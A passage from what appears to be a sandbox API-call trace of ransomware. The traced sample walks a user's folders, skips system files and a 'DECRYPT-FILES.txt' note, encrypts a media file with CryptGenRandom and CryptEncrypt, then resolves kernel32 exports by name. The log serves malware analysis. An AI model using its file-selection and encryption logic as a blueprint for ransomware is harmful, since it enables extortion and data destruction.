9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\*" [0083.209] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78bc85a0, ftCreationTime.dwHighDateTime=0x1d4cfb8, ftLastAccessTime.dwLowDateTime=0xadcbb0a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadcbb0a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0083.209] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.209] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78bc85a0, ftCreationTime.dwHighDateTime=0x1d4cfb8, ftLastAccessTime.dwLowDateTime=0xadcbb0a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadcbb0a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.209] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.209] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.209] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fd32440, ftCreationTime.dwHighDateTime=0x1d4c79a, ftLastAccessTime.dwLowDateTime=0x89af5470, ftLastAccessTime.dwHighDateTime=0x1d4c868, ftLastWriteTime.dwLowDateTime=0x89af5470, ftLastWriteTime.dwHighDateTime=0x1d4c868, nFileSizeHigh=0x0, nFileSizeLow=0x109af, dwReserved0=0x0, dwReserved1=0x0, cFileName="b8eivm.m4a", cAlternateFileName="")) returned 1 [0083.209] lstrcmpiW (lpString1="b8eivm.m4a", lpString2="DECRYPT-FILES.txt") returned -1 [0083.209] lstrcmpiW (lpString1="b8eivm.m4a", lpString2="autorun.inf") returned 1 [0083.209] lstrcmpiW (lpString1="b8eivm.m4a", lpString2="boot.ini") returned -1 [0083.209] lstrcmpiW (lpString1="b8eivm.m4a", lpString2="desktop.ini") returned -1 [0083.209] lstrcmpiW (lpString1="b8eivm.m4a", lpString2="ntuser.dat") returned -1 [0083.209] lstrcmpiW (lpString1="b8eivm.m4a", lpString2="iconcache.db") returned -1 [0083.209] lstrcmpiW (lpString1="b8eivm.m4a", lpString2="bootsect.bak") returned -1 [0083.209] lstrcmpiW (lpString1="b8eivm.m4a", lpString2="ntuser.dat.log") returned -1 [0083.209] lstrcmpiW (lpString1="b8eivm.m4a", lpString2="thumbs.db") returned -1 [0083.209] lstrcmpiW (lpString1="b8eivm.m4a", lpString2="Bootfont.bin") returned -1 [0083.209] lstrlenW (lpString="b8eivm.m4a") returned 10 [0083.209] lstrcmpiW (lpString1="m4a", lpString2="lnk") returned 1 [0083.209] lstrcmpiW (lpString1="m4a", lpString2="exe") returned 1 [0083.209] lstrcmpiW (lpString1="m4a", lpString2="sys") returned -1 [0083.209] lstrcmpiW (lpString1="m4a", lpString2="dll") returned 1 [0083.209] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned 75 [0083.209] lstrlenW (lpString="b8eivm.m4a") returned 10 [0083.209] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" [0083.209] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpString2="b8eivm.m4a" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\b8eivm.m4a") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\b8eivm.m4a" [0083.209] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.210] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\b8eivm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\b8eivm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0083.210] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=68015) returned 1 [0083.210] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0083.210] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0083.210] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.210] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.210] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.210] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0083.211] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0083.212] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.212] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0083.213] CloseHandle (hObject=0x454) returned 1 [0083.213] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.213] WriteFile (in: hFile=0x450, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0083.214] CloseHandle (hObject=0x0) returned 0 [0083.214] CloseHandle (hObject=0x450) returned 1 [0083.214] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.214] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.214] GetTickCount () returned 0x114d460 [0083.214] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.214] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.214] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.215] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.215] lstrlenA (lpString="kernel32.dll") returned 12 [0083.215] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.215] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.215] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.215] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.215] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.215] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.215] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.215] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.215] lstrlenA (lpString="ADDATOMA") returned 8 [0083.215] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.215] lstrlenA (lpString="ADDATOMW") returned 8 [0083.215] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.215] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.215] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.215] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.215] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.215] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.216] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.216] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.216] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.216] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.216] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.216] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.216] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.216] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.216] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.216] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.216] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.216] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.216] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.216] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.216] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.216] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.216] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.216] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.216] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.217] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.217] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.217] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.217] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.217] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.217] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.217] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.217] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.217] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.217] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.217] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.217] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.217] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.217] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.217] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.217] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.217] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.217] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.217] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.217] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.217] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.218] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.218] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.218] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.218] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.218] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.218] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.218] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.218] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.218] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.218] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.218] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.218] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.218] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.218] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.218] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.218] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.218] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.218] lstrlenA (lpString="BEEP") returned 4 [0083.218] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.219] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.219] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.219] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.219] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.219] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.219] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.219] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.219] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.219] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.219] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.219] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.219] lstrlenA (lpString="CANCELIO") returned 8 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.219] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.219] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.219] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.219] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.219] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.219] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.219] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.219] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.220] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.220] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.220] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.220] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.220] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.220] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.220] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.220] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.220] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.220] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.220] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: 